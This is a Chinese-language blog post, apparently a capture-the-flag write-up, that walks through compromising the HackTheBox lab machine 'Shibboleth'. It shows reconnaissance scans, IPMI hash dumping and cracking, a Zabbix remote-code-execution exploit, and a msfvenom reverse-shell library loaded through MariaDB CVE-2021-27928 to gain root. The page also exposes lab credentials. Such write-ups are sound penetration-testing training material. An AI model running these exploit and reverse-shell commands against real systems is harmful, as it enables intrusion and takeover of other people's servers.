

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/icon/apple-touch-icon.png">
  <link rel="icon" href="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/icon/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="何语灵">
  <meta name="keywords" content="">
  
    <meta name="description" content="每周练手">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Shibboleth">
<meta property="og:url" content="https://m0ck1ng-b1rd.github.io/2022/04/13/HTB/Shibboleth/index.html">
<meta property="og:site_name" content="M0cK1nG-b1Rd&#39;s site">
<meta property="og:description" content="每周练手">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://picbedddd.oss-cn-beijing.aliyuncs.com/blog/images_modified/100cfb88684a919c9915ca102378f6ee.png">
<meta property="article:published_time" content="2022-04-13T08:29:25.000Z">
<meta property="article:modified_time" content="2022-04-14T10:56:54.632Z">
<meta property="article:author" content="何语灵">
<meta property="article:tag" content="HackTheBox">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://picbedddd.oss-cn-beijing.aliyuncs.com/blog/images_modified/100cfb88684a919c9915ca102378f6ee.png">
  
  
  
  <title>HackTheBox - Shibboleth - M0cK1nG-b1Rd&#39;s site</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="//picbedddd.oss-cn-beijing.aliyuncs.com/blog/scripts/scroll.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"m0ck1ng-b1rd.github.io","root":"/","version":"1.9.0","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"87rdYWc7BpvmNHtufVgH6hwF-gzGzoHsz","app_key":"FOGIb6hlzKdTWSp4wBpACnWG","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>

  
<meta name="generator" content="Hexo 6.1.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>M0cK1nG-b1Rd&#39;s site</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/761607.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="HackTheBox - Shibboleth"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-04-13 16:29" pubdate>
          2022年4月13日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          30 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar category-bar" style="margin-right: -1rem">
    





<div class="category-list">
  
  
    
    
    
    <div class="category row nomargin-x">
      <a class="category-item 
          list-group-item category-item-action col-10 col-md-11 col-xm-11" title="HackTheBox"
        id="heading-d9fb08be3ed131369df5d4aa808dac70" role="tab" data-toggle="collapse" href="#collapse-d9fb08be3ed131369df5d4aa808dac70"
        aria-expanded="true"
      >
        HackTheBox
        <span class="list-group-count">(16)</span>
        <i class="iconfont icon-arrowright"></i>
      </a>
      
      <div class="category-collapse collapse show" id="collapse-d9fb08be3ed131369df5d4aa808dac70"
           role="tabpanel" aria-labelledby="heading-d9fb08be3ed131369df5d4aa808dac70">
        
        
          
  <div class="category-post-list">
    
    
      
      
        <a href="/2021/12/07/HTB/BountyHunter/" title="HackTheBox - BountyHunter"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - BountyHunter</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Cap/" title="HackTheBox - Cap"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Cap</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Driver/" title="HackTheBox - Driver"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Driver</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Horizontall/" title="HackTheBox - Horizontall"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Horizontall</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Intelligence/" title="HackTheBox - Intelligence"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Intelligence</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Monitors/" title="HackTheBox - Monitors"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Monitors</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Previse/" title="HackTheBox - Previse"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Previse</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Schooled/" title="HackTheBox - Schooled"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Schooled</span>
        </a>
      
    
      
      
        <a href="/2021/12/13/HTB/Seal/" title="HackTheBox - Seal"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Seal</span>
        </a>
      
    
      
      
        <a href="/2022/04/13/HTB/Shibboleth/" title="HackTheBox - Shibboleth"
           class="list-group-item list-group-item-action
           active">
          <span class="category-post">HackTheBox - Shibboleth</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Sink/" title="HackTheBox - Sink"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Sink</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Spider/" title="HackTheBox - Spider"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Spider</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/StartingPoint-Archetype/" title="HackTheBox - StartingPoint-Archetype"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - StartingPoint-Archetype</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/StartingPoint-Pathfinder/" title="HackTheBox - StartingPoint-Pathfinder"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - StartingPoint-Pathfinder</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/dynstr/" title="HackTheBox - dynstr"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - dynstr</span>
        </a>
      
    
      
      
        <a href="/2022/05/19/HTB/Unicode/" title="Unicode"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">Unicode</span>
        </a>
      
    
  </div>

        
      </div>
    </div>
  
</div>


  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">HackTheBox - Shibboleth</h1>
            
              <p class="note note-info">
                
                  
                    本文最后更新于：2022年4月14日 晚上
                  
                
              </p>
            
            <div class="markdown-body">
              
              <h1 id="0x01-Foothold"><a href="#0x01-Foothold" class="headerlink" title="0x01 Foothold"></a>0x01 Foothold</h1><h2 id="端口"><a href="#端口" class="headerlink" title="端口"></a>端口</h2><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">nmap</span> -Pn -sC -sV -v <span class="hljs-number">10.10.11.124</span><br></code></pre></td></tr></table></figure>

<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs 1c">PORT   STATE SERVICE VERSION<br><span class="hljs-number">80</span>/tcp open  http    Apache httpd <span class="hljs-number">2.4</span>.<span class="hljs-number">41</span><br><span class="hljs-string">|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34</span><br><span class="hljs-string">| http-methods: </span><br><span class="hljs-string">|_  Supported Methods: GET POST OPTIONS HEAD</span><br><span class="hljs-string">|_http-server-header: Apache/2.4.41 (Ubuntu)</span><br><span class="hljs-string">|_http-title: FlexStart Bootstrap Template - Index</span><br></code></pre></td></tr></table></figure>

<h2 id="shibboleth-htb"><a href="#shibboleth-htb" class="headerlink" title="shibboleth.htb"></a>shibboleth.htb</h2><p>主站是一个静态的前端界面，没啥搞头，然后扫描目录也无果，只能先放弃这个站点。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220406192415320.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220406192415320"></p>
<p>尝试爆破一下子域名，发现扫出来三个子域名，指向同一个站点。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">wfuzz -u http:<span class="hljs-regexp">//</span>shibboleth.htb -H <span class="hljs-string">&#x27;Host: FUZZ.shibboleth.htb&#x27;</span> -w <span class="hljs-regexp">/usr/</span>share<span class="hljs-regexp">/seclists/</span>Discovery<span class="hljs-regexp">/DNS/</span>subdomains-top1million-<span class="hljs-number">5000</span>.txt<br></code></pre></td></tr></table></figure>

<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404111614875.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404111614875"></p>
<h2 id="zabbix-shibboleth-htb"><a href="#zabbix-shibboleth-htb" class="headerlink" title="zabbix.shibboleth.htb"></a>zabbix.shibboleth.htb</h2><p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404133312567.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404133312567"></p>
<p>点击最底下的help可以跳转到如下URL，可以发现是5.0版本的zabbix，考虑google或searchsploit一下对应的exp。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//</span>www.zabbix.com<span class="hljs-regexp">/documentation/</span><span class="hljs-number">5.0</span>/en<br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404133933409.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404133933409"></p>
<p>在尝试了各种zabbix的常见漏洞后，我觉得可能我路子走错了，于是我回到主站点shibboleth.htb，然后拖到最后发现了一个<code>Bare Metal BMC automation</code>是我之前没有注意到的（论信息收集的重要性）。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220406194739486.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220406194739486"></p>
<p>Google了一下能够发现zabbix的官方网站提到了IPMI，进一步在wikipedia找到了关于IPMI脆弱性的描述。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220406200458500.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220406200458500"></p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220406200704860.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220406200704860"></p>
<p>Rapid7的这篇文章可以在<a target="_blank" rel="noopener" href="https://www.rapid7.com/blog/post/2013/07/02/a-penetration-testers-guide-to-ipmi/">这里</a>找到。</p>
<p>可以通过nmap对UDP端口进行扫描来验证开启了IPMI服务，注意的是要设置 <code>--min-rate</code>选项和 <code>-F</code> 选项，否则扫描的时间将大大增加。</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">sudo</span> nmap -sU -sV - <span class="hljs-number">10.10.11.124</span> --min-rate <span class="hljs-number">7500</span> -F<br></code></pre></td></tr></table></figure>

<p>当然Rapid7出品的msf已经集成了这个模块，首先是使用<code>ipmi_version</code>模块查看IPMI模块的版本。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404140914348.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404140914348"></p>
<p>在确认是有漏洞的IPMI2.0后，使用<code>ipmi_dumphashes</code>模块对其进行hashdump。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404141019802.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404141019802"></p>
<p>然后将dump的hash用hashcat进行爆破，能够得到密码是<code>ilovepumkinpie1</code>。</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">hashcat</span>.exe -a <span class="hljs-number">0</span> -m <span class="hljs-number">7300</span> hash <span class="hljs-string">&quot;password.txt&quot;</span><br></code></pre></td></tr></table></figure>

<p>也就是我们现在拿到了一对凭据<code>Administrator:ilovepumkinpie1</code>，拿着它可以登录zabbix。</p>
<p>登录后看下版本号，为5.0.17，刚好能和一个授权的RCE对上。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404191218891.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404191218891"></p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404191309634.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404191309634"></p>
<p>执行exploit即可拿到zabbix的shell。</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">python3</span> exploit.py http://zabbix.shibboleth.htb/ Administrator ilovepumkinpie1 <span class="hljs-number">10.10.16.10</span> <span class="hljs-number">4444</span><br></code></pre></td></tr></table></figure>

<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs ruby">┌──(kali㉿kali)-[~<span class="hljs-regexp">/桌面/penelope</span>]<br>└─<span class="hljs-variable">$ </span>./penelope.py -Q<br>zabbix<span class="hljs-variable">@shibboleth</span><span class="hljs-symbol">:/</span><span class="hljs-variable">$ </span>whoami<br>zabbix<br>zabbix<span class="hljs-variable">@shibboleth</span><span class="hljs-symbol">:/</span><span class="hljs-variable">$ </span><br></code></pre></td></tr></table></figure>

<h1 id="0x02-user-txt"><a href="#0x02-user-txt" class="headerlink" title="0x02 user.txt"></a>0x02 user.txt</h1><p>在&#x2F;home目录下有ipmi-svc用户，里面有<code>user.txt</code>。</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs elixir">zabbix<span class="hljs-variable">@shibboleth</span><span class="hljs-symbol">:/home</span><span class="hljs-variable">$ </span>ls<br>ipmi-svc<br></code></pre></td></tr></table></figure>

<p>但zabbix拿不到，需要切换到<code>ipmi-svc</code>用户。</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs elixir">zabbix<span class="hljs-variable">@shibboleth</span><span class="hljs-symbol">:/home/ipmi-svc</span><span class="hljs-variable">$ </span>cat user.txt <br><span class="hljs-symbol">cat:</span> <span class="hljs-symbol">user.txt:</span> <span class="hljs-title class_">Permission</span> denied<br></code></pre></td></tr></table></figure>

<p>切换到<code>ipmi-svc</code>用户后就能拿到user.txt了</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs elixir">zabbix<span class="hljs-variable">@shibboleth</span><span class="hljs-symbol">:/</span><span class="hljs-variable">$ </span>su - ipmi-svc<br><span class="hljs-symbol">Password:</span> <br>ipmi-svc<span class="hljs-variable">@shibboleth</span><span class="hljs-symbol">:~</span><span class="hljs-variable">$ </span>whoami<br>ipmi-svc<br>ipmi-svc<span class="hljs-variable">@shibboleth</span><span class="hljs-symbol">:~</span><span class="hljs-variable">$ </span><br>ipmi-svc<span class="hljs-variable">@shibboleth</span><span class="hljs-symbol">:~</span><span class="hljs-variable">$ </span>cat user.txt<br>d21ead8d************************<br></code></pre></td></tr></table></figure>

<h1 id="0x03-root-txt"><a href="#0x03-root-txt" class="headerlink" title="0x03 root.txt"></a>0x03 root.txt</h1><p>首先看看zabbix关于数据库的配置，根据文档得知在<code>/etc/zabbix/zabbix_server.conf</code>中</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs gradle">ipmi-svc@shibboleth:~$ cd <span class="hljs-regexp">/etc/</span>zabbix<br>ipmi-svc@shibboleth:<span class="hljs-regexp">/etc/</span>zabbix$ cat zabbix_server.conf | <span class="hljs-keyword">grep</span> -v <span class="hljs-string">&quot;^#&quot;</span> | <span class="hljs-keyword">grep</span> .<br>LogFile=<span class="hljs-regexp">/var/</span>log<span class="hljs-regexp">/zabbix/</span>zabbix_server.log<br>LogFileSize=<span class="hljs-number">0</span><br>PidFile=<span class="hljs-regexp">/run/</span>zabbix/zabbix_server.pid<br>SocketDir=<span class="hljs-regexp">/run/</span>zabbix<br>DBName=zabbix<br>DBUser=zabbix<br>DBPassword=bloooarskybluh<br>SNMPTrapperFile=<span class="hljs-regexp">/var/</span>log<span class="hljs-regexp">/snmptrap/</span>snmptrap.log<br>Timeout=<span class="hljs-number">4</span><br>AlertScriptsPath=<span class="hljs-regexp">/usr/</span>lib<span class="hljs-regexp">/zabbix/</span>alertscripts<br>ExternalScripts=<span class="hljs-regexp">/usr/</span>lib<span class="hljs-regexp">/zabbix/</span>externalscripts<br>FpingLocation=<span class="hljs-regexp">/usr/</span>bin/fping<br>Fping6Location=<span class="hljs-regexp">/usr/</span>bin/fping6<br>LogSlowQueries=<span class="hljs-number">3000</span><br>StatsAllowedIP=<span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span><br></code></pre></td></tr></table></figure>

<p>拿到数据库凭据<code>zabbix:bloooarskybluh</code>。登录之，查看数据库密码。</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">MariaDB [zabbix]&gt; select alias,passwd from users;              <br><span class="hljs-code">+---------------+</span>--------------------------------------------------------------+<br><span class="hljs-section">| alias         | passwd                                                       |</span><br><span class="hljs-section">+---------------+--------------------------------------------------------------+</span><br>| Admin         | $2y$10$L9tjKByfruByB.BaTQJz/epcbDQta4uRM/KySxSZTwZkMGuKTPPT2 |<br>| guest         | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 |<br><span class="hljs-section">| Administrator | $2y$10$FhkN5OCLQjs3d6C.KtQgdeCc485jKBWPW4igFVEgtIP3jneaN7GQe |</span><br><span class="hljs-section">+---------------+--------------------------------------------------------------+</span><br></code></pre></td></tr></table></figure>

<p>可惜的是这部分最后似乎没啥用，一番探索后看看MariaDB本身是否存在问题，在searchsploit中找一下相关的exp：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404195651752.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404195651752"></p>
<p>然后看一下MariaDB的版本。</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">MariaDB [(none)]&gt; select version();<br><span class="hljs-code">+----------------------------------+</span><br><span class="hljs-section">| version()                        |</span><br><span class="hljs-section">+----------------------------------+</span><br><span class="hljs-section">| 10.3.25-MariaDB-0ubuntu0.20.04.1 |</span><br><span class="hljs-section">+----------------------------------+</span><br>1 row in set (0.000 sec)<br></code></pre></td></tr></table></figure>

<p>再去exploitdb看一下版本，可以看到是符合的。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220406213348531.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220406213348531"></p>
<p>接着就是按照文件中的指示一步步走，首先生成so文件。</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">msfvenom</span> -p linux/x64/shell_reverse_tcp LHOST=<span class="hljs-number">10.10.16.10</span> LPORT=<span class="hljs-number">8888</span> -f elf-so -o CVE-<span class="hljs-number">2021</span>-<span class="hljs-number">27928</span>.so<br></code></pre></td></tr></table></figure>

<p>然后在目标机上下载该恶意so文件。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404201654987.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404201654987"></p>
<p>接着输入执行指令，获得root权限。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">mysql -u zabbix -p -e <span class="hljs-string">&#x27;SET GLOBAL wsrep_provider=&quot;/tmp/CVE-2021-27928.so&quot;;&#x27;</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2022/04/img/Shibboleth.assets/image-20220404202225630.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20220404202225630"></p>

              
            </div>
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Web/" class="category-chain-item">Web</a>
  
  
    <span>></span>
    
  <a href="/categories/Web/%E9%9D%B6%E5%9C%BA/" class="category-chain-item">靶场</a>
  
  
    <span>></span>
    
  <a href="/categories/Web/%E9%9D%B6%E5%9C%BA/HackTheBox/" class="category-chain-item">HackTheBox</a>
  
  

  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/HackTheBox/">#HackTheBox</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>HackTheBox - Shibboleth</div>
      <div>https://m0ck1ng-b1rd.github.io/2022/04/13/HTB/Shibboleth/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>何语灵</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年4月13日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/04/29/%E5%80%92%E8%85%BE/VMWare%E4%B8%8AArch+xfce4%E7%9A%84%E5%AE%89%E8%A3%85%E5%92%8C%E7%BE%8E%E5%8C%96/" title="VMWare上Arch+xfce4的安装和美化">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">VMWare上Arch+xfce4的安装和美化</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
